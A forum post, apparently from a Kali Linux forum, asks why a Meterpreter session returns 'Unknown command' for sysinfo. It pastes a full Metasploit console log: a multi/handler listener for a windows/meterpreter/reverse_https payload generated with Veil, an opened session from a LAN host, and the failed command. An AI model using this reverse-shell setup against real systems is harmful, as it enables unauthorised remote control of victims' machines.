Hello Everybody,
This is the first time i am asking a question in kali forum.
The problem is with meta-sploit framework. Its saying command not found for most of the valid command like sysinfo.
The payload is genereted using veil written in go language. Its reverse_https.
I checked the LPORT and LHOST are correctly configured.
I updated the metasploit framework using apt-get but still the problem is there.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST 192.168.29.138
LHOST => 192.168.29.138
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.29.138 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > exploit
[*] Started HTTPS reverse handler on
https://192.168.29.138:8080[*]
https://192.168.29.138:8080 handling request from 192.168.29.228; (UUID: htb7f2az) Staging x86 payload (181337 bytes) ...[*] Meterpreter session 1 opened (192.168.29.138:8080 -> 192.168.29.228:50624) at 2020-04-13 07:30:52 -0400
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf5 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows 192.168.29.138:8080 -> 192.168.29.228:50624 (192.168.29.228)
msf5 exploit(multi/handler) > sessions -i 1[*] Starting interaction with 1...
meterpreter > sysinfo
[-] Unknown command: sysinfo.
meterpreter >